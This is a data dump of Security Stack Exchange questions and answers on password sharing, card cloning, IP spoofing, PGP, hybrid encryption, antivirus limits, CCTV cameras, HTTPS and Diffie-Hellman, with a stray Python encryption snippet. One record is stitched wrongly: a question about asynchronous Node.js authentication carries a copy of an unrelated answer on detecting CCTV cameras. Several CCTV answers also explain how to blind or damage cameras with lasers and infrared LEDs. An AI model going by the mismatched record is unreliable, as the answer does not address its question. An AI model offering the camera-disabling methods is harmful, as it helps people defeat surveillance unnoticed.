have a foreign national nearby in their social graph. The NSA publicly makes an effort not to collect information about U.S. citizens (though the degree to which this is followed in practice is impossible to verify, as discussed above). | {
"source": [
"https://security.stackexchange.com/questions/37076",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/21882/"
]
} |
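A hedged sketch of the "encrypt before you upload" advice in the answer above, using AES-256-GCM from the pyca/cryptography package. The file name is a placeholder, and the hard part, where and how you store the key so the provider never sees it, is deliberately left out.

import os

from cryptography.hazmat.primitives.ciphers.aead import AESGCM

def encrypt_for_upload(path, key):
    """Return nonce || ciphertext for the file at `path`; upload the result, keep the key local."""
    with open(path, "rb") as f:
        plaintext = f.read()
    nonce = os.urandom(12)                         # 96-bit nonce, never reused with the same key
    return nonce + AESGCM(key).encrypt(nonce, plaintext, None)

def decrypt_after_download(blob, key):
    nonce, ciphertext = blob[:12], blob[12:]
    return AESGCM(key).decrypt(nonce, ciphertext, None)

key = AESGCM.generate_key(bit_length=256)          # store this where the provider cannot see it
blob = encrypt_for_upload("tax_return.pdf", key)   # placeholder file name
# ... push `blob` to the storage service; only the encrypted bytes ever leave your machine ...
assert decrypt_after_download(blob, key) == open("tax_return.pdf", "rb").read()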
37,080 | I'm an IT consultant. One client has known me for a few years. He wants me to do some work on his kids' laptop again. I'll need to log into his kids' Windows user account. (I'm guessing that multiple kids share one account.) This time, he wants to drop the machine off with me. He'll want to tell me the kids' password ( "plan A" ): he trusts me. But I don't want him to get in the habit of insecure practices like sharing passwords with IT consultants. I could propose and encourage a "plan B" : He changes the kids' password to a new, temporary password. I log in, do the work, then force a password change at next logon. Or I could encourage him to make me an account so that I can follow a "plan C" : I reset the kids' password. I log in, do the work, then force a password change at next logon. Still, I want to keep him happy, and I don't want him to waste time or money. I don't want to encourage plan B or plan C unless absolutely necessary. I wonder: Is it really so bad for him to just tell me the kids' password? If it's bad, please explain why, and please cite a source if you can. (Optional:) I always tell customers a per-hour rate. But lately, I've been billing by the minute. If we choose plan C, is it ethical for me to bill him for the extra minutes it will take me? | The problem isn't with this situation in particular. Let's assess the situation here: You're a trustworthy person to them The password is very likely securing trivial data Giving you the password isn't that big of a deal in this case. The problem (like you stated in your question) is that getting him in the habit of giving out passwords. I'd definitely go with plan B. Why? It's the best compromise between security and convenience in this case. It'll teach him about not sharing password, especially if the lesson is coming from a trustworthy person to him. It'll make you look even more professional and shows your interest in your client's security. You don't know, he might spread the word about this situation and in a way you'd be contributing to a better understanding of security (in this kind of situations) in his circle of friends/family. As for your second question, I don't think I'm the best person to answer this, but I'd say no. If something takes you 2-3 minutes and it's obviously trivial compared to another task (fixing whatever is wrong with the computer) don't actually bill the client for the extra 3 minutes of work. It makes nobody look good. | {
"source": [
"https://security.stackexchange.com/questions/37080",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11178/"
]
} |
37,227 | While I was walking in the street, somebody carrying a laptop bag bumped into me, and the next day I found out that my storage unit was burglarized and some important items were stolen. My storage unit door uses a magnetic-stripe card without a PIN, and I have several important items there. The items don't include money or anything that has intrinsic value itself, but they could be important to some parties. I do realize my mistake, I shouldn't have trusted a storage unit with important items. I should have stored them in a deposit box in a bank. To help you guys help me, I'll try to give as much information about the situation as possible: I vividly remember his bag hitting my back pocket in an unnatural way. I immediately checked my wallet after the bump, I made sure my ID, money, and the card were there. The stolen items are of some importance to some people and they would hire PI . I've already informed the police and filed a report. The security cameras in the storage area hallway show a masked person opening the door normally, and there are no signs of forced entry. My question is : Could that person have cloned my card when he bumped into me? Is it really as easy as touching the person's pocket? Does the process really take that small amount of time (1-2 seconds)? Update: After investigation it turned out that the card has an RFID tag inside it, but the storage space operators didn't know about it. It was there just in case they wanted to change the locks to support RFID. The magnetic stripe and the RFID tag both contained the same data, so the thief copied the RFID tag and made a new magnetic card with the information. Yesterday the police caught the thief after catching the person who hired him trying to sell the items to a blackmarket honeypot operated by the police. I identified the thief as the person who bumped into me and he later admitted. | It sounds unlikely. As @schroeder says - a mag stripe must be physically run through a reader. So if you must "swipe" the card to get access, you must swipe the card to copy it. While a pickpocket can take a card out of your pocket, if the card is still in your possession, it's unlikely that this interaction was part of the theft. Keep in mind, however, that a single instant in time is not the only case of potential intrusion: any time the card was left unattended for any time is an opportunity any access to a master card is an opportunity - generally a storage unit will have a master key card - they are loaning you this space, if you default on your rent, or the police have a warrant, they will need to access your space. Whichever card is used as a source, making a copy should leave no evidence on the card. It maybe possible, from digital logs, to see what card was used for access at the time of the break-in. Was it your card? Chances are, you and the storage space management need to think through who had access to the cards that control your space. Addition: Backing up a step to a bigger picture. In any theft, there's a question of due diligence. Any type of security is tricky, and needs a diligent design and careful implementation. 
This particular issue involves: electronics (the mag-stripe key card), physical security (access to your door and the facility at large, as well as video surveillance), and personnel (anyone who was supposed to be watching the video, the people with access to the master card, and overall personnel management). The easiest hack is generally social engineering and working in the nexus of areas of security, where there are often human communication gaps. The general solution is to work with the site as best you can to determine who might have had access. Accusing them of a lack of due diligence probably isn't going to get the job of finding your stuff done... but sooner or later, you or the PI may need to go there to figure out whether you have an insider threat or a fairly clever outside attacker. As the comment thread shows, there are numerous options out there, bigger than the incident you mention, that are just as (if not more) likely as someone managing to pick your pocket. | {
"source": [
"https://security.stackexchange.com/questions/37227",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26985/"
]
} |
37,310 | I'm from Canada, and I'd like to know one thing. I know a bug on one website. I'm not sure if it's legal here to search for bugs on a website and NOT use them; instead, tell its company about it. | It is legal to tell them about the bug, giving them a detailed description of the bug and how you came across it. What is unpredictable is the company's reaction. It could vary to something such as them sending you a reward/small gift (has happened to me), to them trying to prosecute you as a criminal (tipping them off anonymously could help with this issue). If the bug compromises the website and it's information, make it clear that you have not used the bug in this way. If you have the knowledge, try to make suggestions on how to fix the bug, to make it even clearer to the company that you are trying to help them out (something I did as well). Important note: If the company refuses to recognise the vulnerability, do not seek way to exploit it and get it attention. This will most likely result in legal action against you . | {
"source": [
"https://security.stackexchange.com/questions/37310",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27042/"
]
} |
37,436 | Some spam messages fresh from my Wordpress filter: Asking questions are in fact pleasant thing if you are not
understanding something totally, except this article gives good
understanding yet. and Thanks for any other informative blog. Where else may I am getting
that kind of information written in such an ideal means? I’ve a
project that I’m simply now working on, and I have been on the look
out for such info. Is it just that basically all blog spam comes from non-English speaking countries, or is there some kind of tactical decision being made about the language? I ask because when I first saw it, I thought perhaps they were being genuine but inarticulate. | The spammers are automatically generating new comments by taking existing comments and running them through a thesaurus program that replaces words with synonyms or related parts of speech. The result is a sentence which makes sense, but has word choices that no native speaker would ever make: Where else may I am getting ... is clearly not something a native speaker would write, but Where else could she be getting... is, and can be transformed by a simple substitution of pronouns and synonyms into the spam text. This way, even if anti-spam forces have a huge database of known-spam comments, the spammers can generate infinitely many new ones that are plausibly English. I long suspected this was the case but I recently got proof. I now occasionally get comment spam containing the entire substitution script; it'll be something like: I can't [believe/understand/comprehend] the [great/superior/amazing] [content/information/data]... Since the spammers were likely non-English speakers to begin with, they didn't notice they were sending the script rather than the output. If you examine a large enough corpus of spam, you can pretty easily figure out what algorithms they're using. It would be an interesting challenge in reverse engineering to write a program that deduces the algorithms used from the corpus. I ask because when I first saw it, I thought perhaps they were being genuine but inarticulate. They fooled you once. It probably won't happen again! Commenter TildalWave points out: none of the sample spam messages OP posted actually endorse any products, or are otherwise promoting any other cause. Well let me give you an example: here's a comment that arrived a few minutes ago on my blog: user name: cuisinart compact toaster review
user url: toasterovenpicks.com
user email: [email protected]
user IP: 37.59.34.218
Comment contents:
One in particular clue for that bride and groom essential their
own absolutely new everything, actually a surname burned which has a mode,
which render nearly girl thankful recognizing their refreshing surname
therefore distinctively printed. The product is promoted in the user's metadata, not in the content of the comment. The content is just an attempt to get past the spam filter. (I suspect that in this case the text is not a mutation of an existing text but rather generated by a Markov process over a corpus of documents about wedding planning.) Obviously anti-spam forces are on to this one too, which is why this was in my spam filter. My spam filter (akismet) on average lets through one spam for every 705 submitted. Again, that's what spammers are going for; they know that 99.9% of their work will never be seen by anyone. They're trying to randomly explore the space of false negatives in spam filters, a space which is getting quite small indeed. | {
"source": [
"https://security.stackexchange.com/questions/37436",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25874/"
]
} |
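The substitution script quoted in the answer above is easy to reconstruct; a toy Python version shows why signature databases struggle with this kind of spam (the template text is taken from the quoted spam, and real generators do the same thing at scale with larger synonym lists):

import random
import re

TEMPLATE = ("I can't [believe/understand/comprehend] the "
            "[great/superior/amazing] [content/information/data] here.")

def spin(template):
    # Replace each [a/b/c] group with one randomly chosen alternative,
    # producing a "new" comment that no exact-match filter has seen before.
    return re.sub(r"\[([^\]]+)\]",
                  lambda match: random.choice(match.group(1).split("/")),
                  template)

for _ in range(3):
    print(spin(TEMPLATE))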
37,481 | A little while ago, my friends and I argued about whether the TCP handshake can be completed with a spoofed IP address. Assume I have a web server that allows connections only from certain IP addresses.
Can anyone connect to that web server by spoofing an allowed IP? | Short answer: no. Longer answer: yes, if you control a router device close to the target device (it has to be on the path between the real source IP address and the target, and on the path between the faked IP address and the target) or if the target network/host accepts source-routed packets . | {
"source": [
"https://security.stackexchange.com/questions/37481",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/16842/"
]
} |
37,510 | I am beginning to use GPG for email encryption. If I use gpg --edit-key [keyID] to change the passphrase, what files will this affect? Will it only affect my private key, and thus I only need to rebackup this key? Will it leave my public key and the revocation certificate alone, or will these need to be regenerated and then distributed and stored, respectively? | Your PGP private key is encrypted at rest. Altering the passphrase re-encrypts your private key, but it does not affect the actual private key itself. Your passphrase is used to encrypt your private key. From How PGP Works : PGP uses a passphrase to encrypt your private key on your machine. Your private key is encrypted on your disk using a hash of your passphrase as the secret key. You use the passphrase to decrypt and use your private key. When you change your passphrase, the protection around your private key has been altered, but the key itself has not. Consequently, the matching public key is still valid, since its corresponding private key is unchanged. You can back up your newly encrypted private key , since the encryption protection around the key has changed, but the key itself is unchanged. | {
"source": [
"https://security.stackexchange.com/questions/37510",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27223/"
]
} |
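A rough sketch of the idea from the answer above, in Python with the cryptography package. This is not GnuPG's actual key format or string-to-key scheme, only an illustration that changing the passphrase re-wraps the same key material:

import base64
import os
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives.kdf.scrypt import Scrypt

def lock_private_key(private_key_bytes, passphrase):
    # Derive a wrapping key from the passphrase, then encrypt the key material.
    salt = os.urandom(16)
    wrapping_key = Scrypt(salt=salt, length=32, n=2**14, r=8, p=1).derive(passphrase)
    return salt, Fernet(base64.urlsafe_b64encode(wrapping_key)).encrypt(private_key_bytes)

key_material = os.urandom(32)            # stands in for the actual private key
old_wrap = lock_private_key(key_material, b"old passphrase")
new_wrap = lock_private_key(key_material, b"new passphrase")
# Both wraps protect the *same* key material, so the matching public key and
# any revocation certificate generated from it remain valid and unchanged.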
37,581 | Looking into the details of Pretty Good Privacy, I'm confused as to the reasoning behind encrypting the message with a session key and the key with the recipient's public key via RSA. I fail to see how this is any safer than straightforwardly RSA-encrypting the actual message. It may very likely be that I am simply too naive in terms of security and encryption, but if I can obtain your RSA private key, why does it matter whether that gives me access to the message body or the other key that will unlock the message body? | RSA isn't really built to encrypt large pieces of plaintext. Each RSA "round" can encrypt only about 117 bytes of data (that figure is for a 1024-bit key with PKCS#1 v1.5 padding), and to encrypt more, you'd have to use some chaining mode . Currently, this means extra overhead, slowness (remember, RSA is pretty slow), and security uncertainty (an RSA chaining mode hasn't been scrutinized the way other encryption schemes have). <- BAD By using hybrid encryption (symmetric encryption of the data + asymmetric encryption of the symmetric key) you get the benefits of asymmetric, namely not having to worry about exchanging keys, and of symmetric, which is very fast and well-vetted. <- GOOD (A short sketch of this hybrid pattern follows this entry.) For more information please check: How can I use asymmetric encryption, such as RSA, to encrypt an arbitrary length of plaintext? | {
"source": [
"https://security.stackexchange.com/questions/37581",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/22511/"
]
} |
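A minimal sketch of that hybrid construction in Python with the cryptography package (this shows the general pattern, not OpenPGP's exact packet format):

import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

recipient = rsa.generate_private_key(public_exponent=65537, key_size=2048)
message = b"an arbitrarily long message..." * 1000

# 1. Encrypt the bulk data with a fresh, random symmetric session key (fast).
session_key = AESGCM.generate_key(bit_length=128)
nonce = os.urandom(12)
body = AESGCM(session_key).encrypt(nonce, message, None)

# 2. Encrypt only the small session key with the recipient's RSA public key.
wrapped_key = recipient.public_key().encrypt(
    session_key,
    padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                 algorithm=hashes.SHA256(), label=None))

# The recipient reverses the steps: RSA-decrypt wrapped_key, then AES-decrypt body.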
37,588 | How secure is the new Windows 8 anti virus known as Windows Defender? Does it have a protection against malware which uses UAC bypass/process injection/rootkits/process persistence/running the binary directly in the memory? How much can I trust Windows Defender? Is it better than regular AVs like Kaspersky/AntiVir? | Let us analyze each one of the techniques you want the AV to protect against: UAC Bypass: Any process in the Windows environment running with the trusted root certificate can turn off the UAC bit of its own process, as well as any process spawned by it. This means that if your malicious code can inject itself into a process running with the trusted cert, it will have all the privileges of the injected process. Then, if you create another process, you can easily turn its UAC bit off, because this is a built-in feature of Microsoft Windows. This is the technique employed by the Metasploit framework for UAC Bypass. Process Injection: Microsoft provides an API called LoadLibrary through which you can load any arbitrary DLL from the disk into a running process. The only thing that malicious code does is load the arbitrary DLL from within memory, and not from the disk. This is achieved through a technique called Reflective DLL Injection , which Meterpreter makes use of as well. Root Kit Detection: Rootkits operate at ring zero (kernel level), while antivirus products run in userspace. Most of the time, the AV only hooks certain APIs in kernel land. Any process running below the user space cannot be analyzed by the AV. Before Vista, AV products used to load drivers in the kernel for monitoring. However, after the introduction of PatchGuard , that technique can no longer be used by antivirus software. Running the Process Directly Within Memory: This is an area where AVs have made some progress. Nowadays, even if you are directly interacting with a running process, the AV examines the traffic received by the process from the network, and checks it for malicious signatures. However, there are two shortcomings to this approach: first, it is signature based checking, so it is inherently weak. Secondly, it is done only for common Windows processes such as SMB. As you can see, the things you most want to protect against, are the kinds of things against which no AV product can effectively defend. Most of the items you have mentioned are not malicious by nature. Rather, these are considered "features." In Windows 8, Windows Defender is the combination of Microsoft Security Essentials and Microsoft Defender software. On the plus side, it is free, and has low performance impact. However, if you really want to protect against the techniques you have mentioned, Windows Defender, or any other AV product, won't be able to provide an effective solution. For these kind of attacks, Microsoft has another product called the Enhanced Mitigation Experience Toolkit (EMET) . | {
"source": [
"https://security.stackexchange.com/questions/37588",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25543/"
]
} |
37,686 | Is there any way that an attacker can identify if a CCTV camera is on/operational without direct physical access to the cable/camera? If it is on, is there any way an attacker can tell if its being viewed/recorded or not with access to the camera/cables but no access to the recording/viewing rooms? | This would really depend on whether you care or not of being detected in the process and how much you're willing to invest into equipment, but sure. Provided there aren't some other, obvious signs the camera is on, such as the pan and tilt motors working Low-tech approach : This is actually really similar to how doctors test patients for involuntary reflex reaction with a light source directed in patients' eyes and observing dilation (or lack thereof) of their pupils. Most well designed CCTV cameras would have what is called an Auto Iris (AI) . Basically an automatic method of varying the size of a lens aperture, to allow the correct amount of light to fall on the imaging device. The lens would include a tiny motor and an amplifier, which are used to maintain a desired voltage video signal as produced by varying levels of light falling on its image sensor. By changing the level of light this camera's AI sensor receives, you could visually inspect the camera's iris movement even from an angle it can not record you (depending on its depth of field), or even audibly inspect the presence of such AI motor. Since these would be precision step (or stepper) motors, you would hear either a distinct buzz of it rotating, or the faint click when it's adjusted its step. Beware though, some ultra silent stepper motors have been developed already, tho I have yet to see CCTV cameras actually using them. Similar testing could be applied to other camera's components (e.g. auto-focus), with varying degree of how stealthy the tester could remain during this testing. High-tech approach : This is easy and rather obvious - electronic bug detectors are capable of detecting compromising emanations (basically EMI: RF -> microwave -> IR fields in their descending wavelength / increasing frequency). Obviously they would all have some way of telling you which direction the compromising emanations are originating from, and most also at what specific frequencies and their exact strength. Such devices are getting fairly cheap nowadays, and you can buy pretty decently capable ones off local resellers for up to a few hundred dollars, or even a second-hand one for roughly a quarter of that price off online resellers. Since the choice is fairly good, I won't give you any links to specific products, not wanting to endorse any specific manufacturer. This detection would work both for wired, as well as wireless CCTV cameras. Wired CCTV systems would produce what is called a ballanced signal when on, which is a video signal that has been converted to enable it to be transmitted along 'twisted pair' cables, while the wireless (RF, or less common IR that require direct line of sight from the camera to the receiver) CCTV systems are even more apparent and would transmit higher energy radiation in their specified range (on top of compromising emanations from its internal circuitry). 
Now, the other part of your question - detecting, if the video/audio feed is actually being recorded - is a bit more tricky to answer and would greatly depend on what system we're talking of here: Analogue recording systems (rare nowadays) would actually add a bit more latency to the EM field emanating closed-loop when switched on (producing feedback spike in sine wave oscillation), basically moving the signal termination point a bit further on the power line (or separate signal cable, if not combined). This might, or might not be detectable by your equipment. Mind you, I do mean here only the exact moment when the recording device is switched on or off, and you would have a lot harder time detecting which state it's on, if it's in continuous mode of operation. Knowing the system beforehand and actually measuring its signal levels when on/off would obviously help. Digital CCTV systems are a fair bit trickier to detect, if they're actually recording or not. In fact, you wouldn't be able to tell the difference between merely a receiver being on, or the recording system also doing its job that's connected to the receiver. With a bit of luck, you'd be dealing with direct-controllable IP cameras that would have a variable bit-rate (VBR) A/V feed encoder chip. This change in required bit-rate can be detected by better electronic bug detectors, but knowing the change in detectable EMI for the exact CCTV system beforehand would be of great help. With CBR / ABR (constant or average bit-rate) encoders, you'd most probably be out of luck though. Now, I didn't write anything about disabling them, since you're not really inquiring about that, but maybe just a quick note that it's actually getting easier the more advanced they get, and with most new ones all you need is a decent pocket/torch size green laser (532 nm) directed for a few seconds directly into their CCD / CMOS sensor. The higher their resolution, the faster they will give up , depending also on laser's Watt rating, how much light diffraction are we talking of due to lens elements arrangement, their focal point, e.t.c. On wireless systems, you could actually detect their sensor's death by observing a sudden drop in compromising emanations intensity (camera's onboard video compression would be at its best with all the images of some framerate being the same, thus lowering the wireless frequency transmissions, i.e. lowering bandwidth). Just mind, that CCTV cameras might be a whole lot more than cameras only, and pack audible and/or activity (movement / proximity / pressure change / presence of other compromising emanations / ...) detection sensors as well. And the most funny of all (to me, as I wouldn't really care of being detected or not) is being highly equipped for any eventuality, but then unwittingly manage to disturb some wildlife (bats, birds, rodents,...) with your presence, that would fright and trigger the CCTV system's response for you. | {
"source": [
"https://security.stackexchange.com/questions/37686",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/18541/"
]
} |
37,689 | I'm currently developing a web application using Node.js (server-side JavaScript) and MongoDB (NoSQL database). I'm at the stage where I have to design the authentication and I had a question about asynchronous programming. One of the advantages of using Node.js is that everything can be programmed to be asynchronous and thus non-blocking when doing I/O operations. In the case of authentication, should I write everything synchronously? I'm afraid that an attacker could spam my server with requests that would lead to the creation of duplicate accounts (or other objects) and maybe security issues later on. MongoDB doesn't support transactions like SQL. Am I right to worry about asynchronous authentication processes? | This would really depend on whether you care or not of being detected in the process and how much you're willing to invest into equipment, but sure. Provided there aren't some other, obvious signs the camera is on, such as the pan and tilt motors working Low-tech approach : This is actually really similar to how doctors test patients for involuntary reflex reaction with a light source directed in patients' eyes and observing dilation (or lack thereof) of their pupils. Most well designed CCTV cameras would have what is called an Auto Iris (AI) . Basically an automatic method of varying the size of a lens aperture, to allow the correct amount of light to fall on the imaging device. The lens would include a tiny motor and an amplifier, which are used to maintain a desired voltage video signal as produced by varying levels of light falling on its image sensor. By changing the level of light this camera's AI sensor receives, you could visually inspect the camera's iris movement even from an angle it can not record you (depending on its depth of field), or even audibly inspect the presence of such AI motor. Since these would be precision step (or stepper) motors, you would hear either a distinct buzz of it rotating, or the faint click when it's adjusted its step. Beware though, some ultra silent stepper motors have been developed already, tho I have yet to see CCTV cameras actually using them. Similar testing could be applied to other camera's components (e.g. auto-focus), with varying degree of how stealthy the tester could remain during this testing. High-tech approach : This is easy and rather obvious - electronic bug detectors are capable of detecting compromising emanations (basically EMI: RF -> microwave -> IR fields in their descending wavelength / increasing frequency). Obviously they would all have some way of telling you which direction the compromising emanations are originating from, and most also at what specific frequencies and their exact strength. Such devices are getting fairly cheap nowadays, and you can buy pretty decently capable ones off local resellers for up to a few hundred dollars, or even a second-hand one for roughly a quarter of that price off online resellers. Since the choice is fairly good, I won't give you any links to specific products, not wanting to endorse any specific manufacturer. This detection would work both for wired, as well as wireless CCTV cameras. 
Wired CCTV systems would produce what is called a ballanced signal when on, which is a video signal that has been converted to enable it to be transmitted along 'twisted pair' cables, while the wireless (RF, or less common IR that require direct line of sight from the camera to the receiver) CCTV systems are even more apparent and would transmit higher energy radiation in their specified range (on top of compromising emanations from its internal circuitry). Now, the other part of your question - detecting, if the video/audio feed is actually being recorded - is a bit more tricky to answer and would greatly depend on what system we're talking of here: Analogue recording systems (rare nowadays) would actually add a bit more latency to the EM field emanating closed-loop when switched on (producing feedback spike in sine wave oscillation), basically moving the signal termination point a bit further on the power line (or separate signal cable, if not combined). This might, or might not be detectable by your equipment. Mind you, I do mean here only the exact moment when the recording device is switched on or off, and you would have a lot harder time detecting which state it's on, if it's in continuous mode of operation. Knowing the system beforehand and actually measuring its signal levels when on/off would obviously help. Digital CCTV systems are a fair bit trickier to detect, if they're actually recording or not. In fact, you wouldn't be able to tell the difference between merely a receiver being on, or the recording system also doing its job that's connected to the receiver. With a bit of luck, you'd be dealing with direct-controllable IP cameras that would have a variable bit-rate (VBR) A/V feed encoder chip. This change in required bit-rate can be detected by better electronic bug detectors, but knowing the change in detectable EMI for the exact CCTV system beforehand would be of great help. With CBR / ABR (constant or average bit-rate) encoders, you'd most probably be out of luck though. Now, I didn't write anything about disabling them, since you're not really inquiring about that, but maybe just a quick note that it's actually getting easier the more advanced they get, and with most new ones all you need is a decent pocket/torch size green laser (532 nm) directed for a few seconds directly into their CCD / CMOS sensor. The higher their resolution, the faster they will give up , depending also on laser's Watt rating, how much light diffraction are we talking of due to lens elements arrangement, their focal point, e.t.c. On wireless systems, you could actually detect their sensor's death by observing a sudden drop in compromising emanations intensity (camera's onboard video compression would be at its best with all the images of some framerate being the same, thus lowering the wireless frequency transmissions, i.e. lowering bandwidth). Just mind, that CCTV cameras might be a whole lot more than cameras only, and pack audible and/or activity (movement / proximity / pressure change / presence of other compromising emanations / ...) detection sensors as well. And the most funny of all (to me, as I wouldn't really care of being detected or not) is being highly equipped for any eventuality, but then unwittingly manage to disturb some wildlife (bats, birds, rodents,...) with your presence, that would fright and trigger the CCTV system's response for you. | {
"source": [
"https://security.stackexchange.com/questions/37689",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27389/"
]
} |
37,697 | @D3C4FF has asked a great question and I would like to follow up on that. Basically he had asked whether "[...] an attacker can identify if a CCTV camera is on/operational without direct physical access to the cable/camera [.]". I was highly impressed by @TildalWave 's answer , and particularly about disabling cameras: "[...] all you need is a decent pocket/torch size green laser (532 nm) directed for a few seconds directly into their CCD/CMOS sensor. ". I remember some 10 years ago kids in my neighborhood had found out that you could 'DoS' the street lights using the same technique (by pointing the laser to a point near the back of the light bulb). I figured out that this was because those posts light automatically when it gets dark (meaning lack of light) and as soon as it gets bright (meaning light went inside its sensors) the light would turn off. So I would like to ask: 1 - How does this laser attack apply to cameras? 2 - For which types of cameras does the laser pen attack work against (CCTV Vs. IP)? 3 - Is the laser pen attack the only vector against those devices (apart from obvious things like fire, TNT, acid, shooting, etc)? 4 - Why are cameras still vulnerable to it, if at all? 5 - Finally, how can I prevent those type of attacks against my cameras (they are all IP-based)? Just a quick edit for those who (like me) was not sure whether this question was appropriate for the site, I have posted a question on Meta . | I've experimented with this attack previously. It depends on a few variables. First, the strength in mW of the laser you are using. Second the quality of the camera you are trying to disable. 1 - How does this laser attack apply to cameras? A laser creates a super bright and focused spot on the CCD (camera sensor). This spot can be bright enough to blind the camera, or strong enough to physically damage the CCD/CMOS sensor of the camera (melting, overloading the circuitry etc). This is the type of image you'll see when a lazer is pointed at your camera: 2 - For which types of cameras does the laser pen attack work against (CCTV Vs. IP)? It doesn't matter. It will work on ALL visible light imaging technologies. This includes film cameras, CCD, CMOS sensors etc. I've tested this with 'prosumer' point and shoot cameras and a wide variety of CCTV cameras. Being IP/CCTV doesn't change the fact that your overloading the light sensing components of the imaging sensor. 3 - Is the laser pen attack the only vector against those devices (apart from obvious things like fire, TNT, acid, shooting, etc)? NO! Another clever one that i've used to success is wearable Infrared LED clothes (usually on a hat). This is essentially the same as using a bright light to obscure you from view, you will show up on the screen, but if you use bright enough LED's, it'll make you un-identifiable. 4 - Why are cameras still vulnerable to it, if at all? Because cameras sense light, if you throw enough light at them, they won't be able to process the weaker reflected ambient light. 5 - Finally, how can I prevent those type of attacks against my cameras (they are all IP-based)? You can't really. Its part of the design of the cameras. The best thing to do would be to identify cameras that may be vulnerable and perhaps install hidden cameras in the area so that if someone disables an overt camera, they'll hopefully miss the covert one. 
For more information on this type of attack, check this guy's site , there have been a few projects like this around but this is well written up and contains lots of good example shots. | {
"source": [
"https://security.stackexchange.com/questions/37697",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/20008/"
]
} |
37,701 | This may be a common sense question, but I am not able to find any documentation on this after searching on google for a long time When browser makes a HTTPs request, does it encrypt the data then and there, and any proxy (even on the same system) will receive the data in an encrypted form? Can that data be tampered successfully via proxy (on the same system, not on network)? If browser does the encryption/decryption, then please let me know if there is any documentation which says so. Or whether the encryption/decryption is taken care by underlying SSL protocol only at the transport level (when the request is in network). | The ‘S’ in HTTPS stands for ‘secure’ (Hypertext Transfer Protocol Secure) It is a communication protocol for secure communication that makes use of Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL). TLS/SSL is initialized at layer 5 ( the session layer ) then works at layer 6 ( the presentation layer ). Most applications, like web browsers, e-mail clients or instant messaging incorporate functionality of the OSI layers 5, 6 and 7. When referring to HTTPS it will be an implementation of SSL/TLS in the context of the HTTP protocol. SSL/TLS will then be implemented in the browsers (and web server) to provide confidentiality and integrity for HTTPS traffic (actual encryption of the data). Chromium and Firefox use an API called NSS to implement SSL/TLS within their respective browser. Microsoft Windows for example has a security package called SChannel (Secure Channel) which implements SSL/TLS in order to provide authentication between clients and servers. Schannel is for example being used by Microsoft Windows clients/servers within an Active Directory environment. As for the proxy and tampering of the data it depends of the protocol you're working with. A good example to familiarize yourself in an HTTP(S) context is to have a look at Burp Proxy . | {
"source": [
"https://security.stackexchange.com/questions/37701",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27398/"
]
} |
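The same division of labour is visible in any TLS-capable client. A short Python example using only the standard library: the handshake and all encryption happen inside the application's TLS library before anything reaches the network, which is what a browser does through NSS or SChannel. A proxy in between only ever sees ciphertext, unless it terminates TLS itself by presenting its own certificate, as intercepting proxies like Burp do:

import socket
import ssl

context = ssl.create_default_context()      # verifies the server certificate

with socket.create_connection(("example.com", 443)) as raw_sock:
    # wrap_socket performs the TLS handshake; from here on, every byte the
    # application sends is encrypted before it is handed to the TCP socket.
    with context.wrap_socket(raw_sock, server_hostname="example.com") as tls_sock:
        tls_sock.sendall(b"GET / HTTP/1.1\r\nHost: example.com\r\nConnection: close\r\n\r\n")
        print(tls_sock.recv(200))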
37,797 | From my understanding, one of the major reasons we recommend Diffie-Hellman Ephemeral (e.g. DHE or ECDHE) over non-ephemeral DH, for SSL / TLS, is that compromise of the RSA private key (i.e. private certificate) would allow an attacker to decrypt previously captured conversations. In contrast, ephemeral should prevent decryption unless the attacker is in posession of the key at the time of the conversation. How does this decryption of non-ephemeral Diffie-Hellman key exchange work in this context? Is it simply a case of observing the unencrypted primitives that are exchanged over the wire? If so, what is the point of using DH, if it provides no additional security over encrypting the key with RSA, and RSA already provides authentication of the server? | First let's be sure that we talk about the same thing. In SSL , there are "ephemeral DH cipher suites" (DHE) and "non-ephemeral DH cipher suites" (DH). With DHE, the server private key (the permanent one, the one which is stored in a file, and whose public key is in the server certificate) is of type RSA (DHE_RSA cipher suites) or DSS (DHE_DSS cipher suites), and is used only for signatures . The server generates a new random DH key pair (the private key will not be stored, which is how perfect forward secrecy is achieved: a private key cannot be stolen afterwards if it has never been stored), and sends the public key to the client, in a message which the server signs with its RSA or DSS private key. With DH cipher suites, the permanent server private key is a DH private key. The server certificate contains the DH public key. The server cannot see its RSA key be stolen because the server does not have a RSA key. The server only has a DH key. When a cipher suites is called "DH_RSA", it means "the server key is a DH key, and the server certificate was issued (i.e. signed) by a Certification Authority who uses a RSA key" . Stealing the DH private key of one party involved in a DH key exchange allows ulterior reconstruction of the shared secret, just like RSA. In "ephemeral DH", the PFS is obtained through "ephemeral", not through "DH". Technically, it would be possible to have "ephemeral RSA" but it is not done in practice(*) because generating a new RSA key pair is kinda expensive, whereas producing a new DH key pair is cheap. (*) Ephemeral RSA keys were possible with old versions of SSL as part of the "export" cipher suites, meant to comply with the pre-2000 US export regulations: the server could have a 1024-bit signature RSA key, and generate an ephemeral 512-bit RSA key pair for key exchange, used in encryption mode. I don't recall having ever seen that in the wild, though, and it is a moot point since US export regulations on key sizes were lifted. Non-ephemeral DH cipher suites exist in order to allow servers with DH certificates to operate. DH keys in certificate exist because in older times, RSA was patented but DH was not, so standardization bodies, in particular NIST, were pushing DH as the must-implement standard. Reality caught up with that, though. I have never seen a SSL server using a DH certificate. Everybody uses RSA. The RSA patent expired a decade ago anyway. | {
"source": [
"https://security.stackexchange.com/questions/37797",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5400/"
]
} |
